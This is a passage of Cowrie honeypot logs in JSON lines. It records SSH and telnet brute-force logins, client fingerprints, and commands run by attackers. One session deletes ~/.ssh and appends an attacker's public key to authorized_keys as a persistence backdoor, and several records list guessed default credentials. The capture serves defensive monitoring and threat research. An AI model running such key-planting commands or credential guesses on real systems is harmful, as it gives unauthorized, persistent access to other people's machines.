cdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T06:15:55.097064Z","src_ip":"139.19.117.131","session":"cc313877f905"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"b5:0f:3b:84:da:2b:30:39:22:03:af:3c:70:ff:81:e9","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2Rc389h4FbhGchrjdFbrSvtP8ArltT/HTKCmptRpeE9CAcH0dfnJ/rMGsMCGT3/g/jy8DZpMS7G8qNjZWVGIVXWiiRoGNy0l/FMaQRF3ufumxMN1DnK0+JY2w1VGxWB5ca9Np6va1I1kA71zf+khycNGIL1q0uzHmyOIfsiDVwC5J0Wf8p+zSySF4dDA44mMpPvrJ3Bht8PS8Um4/heLtwQPqmg0kNLfmjEBQGe5NyOumE/y0edk9qPqkEdWU88tWA17CfYBIDOf35LPt3zeh6aA+Wu8D9SxuKwH+iXHNAi1p/USo4HFjiYhXMjvG0m9sagCNrIKMxtWGiic8Nhxh","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint b5:0f:3b:84:da:2b:30:39:22:03:af:3c:70:ff:81:e9","sensor":"my-vps","timestamp":"2025-08-26T06:15:55.135394Z","src_ip":"139.19.117.131","session":"cc313877f905"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"b5:0f:3b:84:da:2b:30:39:22:03:af:3c:70:ff:81:e9","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2Rc389h4FbhGchrjdFbrSvtP8ArltT/HTKCmptRpeE9CAcH0dfnJ/rMGsMCGT3/g/jy8DZpMS7G8qNjZWVGIVXWiiRoGNy0l/FMaQRF3ufumxMN1DnK0+JY2w1VGxWB5ca9Np6va1I1kA71zf+khycNGIL1q0uzHmyOIfsiDVwC5J0Wf8p+zSySF4dDA44mMpPvrJ3Bht8PS8Um4/heLtwQPqmg0kNLfmjEBQGe5NyOumE/y0edk9qPqkEdWU88tWA17CfYBIDOf35LPt3zeh6aA+Wu8D9SxuKwH+iXHNAi1p/USo4HFjiYhXMjvG0m9sagCNrIKMxtWGiic8Nhxh","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T06:15:55.136069Z","src_ip":"139.19.117.131","session":"cc313877f905"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"b5:0f:3b:84:da:2b:30:39:22:03:af:3c:70:ff:81:e9","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2Rc389h4FbhGchrjdFbrSvtP8ArltT/HTKCmptRpeE9CAcH0dfnJ/rMGsMCGT3/g/jy8DZpMS7G8qNjZWVGIVXWiiRoGNy0l/FMaQRF3ufumxMN1DnK0+JY2w1VGxWB5ca9Np6va1I1kA71zf+khycNGIL1q0uzHmyOIfsiDVwC5J0Wf8p+zSySF4dDA44mMpPvrJ3Bht8PS8Um4/heLtwQPqmg0kNLfmjEBQGe5NyOumE/y0edk9qPqkEdWU88tWA17CfYBIDOf35LPt3zeh6aA+Wu8D9SxuKwH+iXHNAi1p/USo4HFjiYhXMjvG0m9sagCNrIKMxtWGiic8Nhxh","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint b5:0f:3b:84:da:2b:30:39:22:03:af:3c:70:ff:81:e9","sensor":"my-vps","timestamp":"2025-08-26T06:15:55.154293Z","src_ip":"139.19.117.131","session":"cc313877f905"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"b5:0f:3b:84:da:2b:30:39:22:03:af:3c:70:ff:81:e9","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC2Rc389h4FbhGchrjdFbrSvtP8ArltT/HTKCmptRpeE9CAcH0dfnJ/rMGsMCGT3/g/jy8DZpMS7G8qNjZWVGIVXWiiRoGNy0l/FMaQRF3ufumxMN1DnK0+JY2w1VGxWB5ca9Np6va1I1kA71zf+khycNGIL1q0uzHmyOIfsiDVwC5J0Wf8p+zSySF4dDA44mMpPvrJ3Bht8PS8Um4/heLtwQPqmg0kNLfmjEBQGe5NyOumE/y0edk9qPqkEdWU88tWA17CfYBIDOf35LPt3zeh6aA+Wu8D9SxuKwH+iXHNAi1p/USo4HFjiYhXMjvG0m9sagCNrIKMxtWGiic8Nhxh","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-26T06:15:55.154987Z","src_ip":"139.19.117.131","session":"cc313877f905"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:16:05.079074Z","src_ip":"139.19.117.131","session":"cc313877f905"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":53852,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce90dbc91e34","protocol":"ssh","message":"New connection: 45.88.8.186:53852 (1.2.3.4:22) [session: ce90dbc91e34]","sensor":"my-vps","timestamp":"2025-08-26T06:16:06.358369Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:16:06.985111Z","src_ip":"45.88.8.186","session":"ce90dbc91e34"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T06:16:06.985755Z","src_ip":"45.88.8.186","session":"ce90dbc91e34"}
{"eventid":"cowrie.login.success","username":"root","password":"575757","message":"login attempt [root/575757] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:16:09.297931Z","src_ip":"45.88.8.186","session":"ce90dbc91e34"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:16:09.980828Z","src_ip":"45.88.8.186","session":"ce90dbc91e34"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":55966,"dst_ip":"1.2.3.4","dst_port":22,"session":"985e22397973","protocol":"ssh","message":"New connection: 134.199.225.42:55966 (1.2.3.4:22) [session: 985e22397973]","sensor":"my-vps","timestamp":"2025-08-26T06:16:31.146780Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:16:31.147978Z","src_ip":"134.199.225.42","session":"985e22397973"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:16:31.307655Z","src_ip":"134.199.225.42","session":"985e22397973"}
{"eventid":"cowrie.login.failed","username":"user","password":"adminroot","message":"login attempt [user/adminroot] failed","sensor":"my-vps","timestamp":"2025-08-26T06:16:31.985246Z","src_ip":"134.199.225.42","session":"985e22397973"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:16:33.145994Z","src_ip":"134.199.225.42","session":"985e22397973"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52818,"dst_ip":"1.2.3.4","dst_port":23,"session":"7b91735686eb","protocol":"telnet","message":"New connection: 212.227.235.229:52818 (1.2.3.4:23) [session: 7b91735686eb]","sensor":"my-vps","timestamp":"2025-08-26T06:16:55.549200Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T06:16:56.073969Z","src_ip":"212.227.235.229","session":"7b91735686eb"}
{"eventid":"cowrie.session.closed","duration":4.008134603500366,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:16:59.555872Z","src_ip":"212.227.235.229","session":"7b91735686eb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52830,"dst_ip":"1.2.3.4","dst_port":23,"session":"4be12cc92d47","protocol":"telnet","message":"New connection: 212.227.235.229:52830 (1.2.3.4:23) [session: 4be12cc92d47]","sensor":"my-vps","timestamp":"2025-08-26T06:16:59.755267Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:17:00.366402Z","src_ip":"212.227.235.229","session":"4be12cc92d47"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:17:00.416699Z","src_ip":"212.227.235.229","session":"4be12cc92d47"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-26T06:17:00.669264Z","src_ip":"212.227.235.229","session":"4be12cc92d47"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.4","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:17:01.844034Z","src_ip":"212.227.235.229","session":"4be12cc92d47"}
{"eventid":"cowrie.session.closed","duration":2.099287986755371,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:17:01.856413Z","src_ip":"212.227.235.229","session":"4be12cc92d47"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":42186,"dst_ip":"1.2.3.4","dst_port":22,"session":"4198ebd8c795","protocol":"ssh","message":"New connection: 134.199.225.42:42186 (1.2.3.4:22) [session: 4198ebd8c795]","sensor":"my-vps","timestamp":"2025-08-26T06:17:33.978424Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:17:33.979320Z","src_ip":"134.199.225.42","session":"4198ebd8c795"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:17:34.143529Z","src_ip":"134.199.225.42","session":"4198ebd8c795"}
{"eventid":"cowrie.login.success","username":"root","password":"centos123","message":"login attempt [root/centos123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:17:34.841993Z","src_ip":"134.199.225.42","session":"4198ebd8c795"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:17:35.190794Z","src_ip":"134.199.225.42","session":"4198ebd8c795"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:17:35.191923Z","src_ip":"134.199.225.42","session":"4198ebd8c795"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:17:35.193247Z","src_ip":"134.199.225.42","session":"4198ebd8c795"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:17:35.360397Z","src_ip":"134.199.225.42","session":"4198ebd8c795"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:17:35.788713Z","src_ip":"134.199.225.42","session":"4198ebd8c795"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T06:17:35.789425Z","src_ip":"134.199.225.42","session":"4198ebd8c795"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T06:17:35.956526Z","src_ip":"134.199.225.42","session":"4198ebd8c795"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:17:35.957424Z","src_ip":"134.199.225.42","session":"4198ebd8c795"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":42192,"dst_ip":"1.2.3.4","dst_port":22,"session":"814b5a289acb","protocol":"ssh","message":"New connection: 134.199.225.42:42192 (1.2.3.4:22) [session: 814b5a289acb]","sensor":"my-vps","timestamp":"2025-08-26T06:17:36.113703Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:17:36.114457Z","src_ip":"134.199.225.42","session":"814b5a289acb"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:17:36.271640Z","src_ip":"134.199.225.42","session":"814b5a289acb"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T06:17:36.942328Z","src_ip":"134.199.225.42","session":"814b5a289acb"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:17:38.101638Z","src_ip":"134.199.225.42","session":"814b5a289acb"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":58320,"dst_ip":"1.2.3.4","dst_port":22,"session":"1995dc93d91d","protocol":"ssh","message":"New connection: 134.199.225.42:58320 (1.2.3.4:22) [session: 1995dc93d91d]","sensor":"my-vps","timestamp":"2025-08-26T06:17:38.261906Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:17:38.262528Z","src_ip":"134.199.225.42","session":"1995dc93d91d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:17:38.422398Z","src_ip":"134.199.225.42","session":"1995dc93d91d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:17:39.101204Z","src_ip":"134.199.225.42","session":"1995dc93d91d"}
{"eventid":"cowrie.session.closed","duration":"5.3","message":"Connection lost after 5.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:17:39.260976Z","src_ip":"134.199.225.42","session":"4198ebd8c795"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:17:39.263777Z","src_ip":"134.199.225.42","session":"1995dc93d91d"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":53932,"dst_ip":"1.2.3.4","dst_port":22,"session":"86507756700d","protocol":"ssh","message":"New connection: 134.199.225.42:53932 (1.2.3.4:22) [session: 86507756700d]","sensor":"my-vps","timestamp":"2025-08-26T06:18:36.937512Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:18:36.939274Z","src_ip":"134.199.225.42","session":"86507756700d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:18:37.098189Z","src_ip":"134.199.225.42","session":"86507756700d"}
{"eventid":"cowrie.login.failed","username":"auditor","password":"auditor","message":"login attempt [auditor/auditor] failed","sensor":"my-vps","timestamp":"2025-08-26T06:18:37.774969Z","src_ip":"134.199.225.42","session":"86507756700d"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:18:38.937196Z","src_ip":"134.199.225.42","session":"86507756700d"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50182,"dst_ip":"1.2.3.4","dst_port":22,"session":"29cd17a279ff","protocol":"ssh","message":"New connection: 217.72.205.35:50182 (1.2.3.4:22) [session: 29cd17a279ff]","sensor":"my-vps","timestamp":"2025-08-26T06:19:11.131453Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:19:11.132578Z","src_ip":"217.72.205.35","session":"29cd17a279ff"}
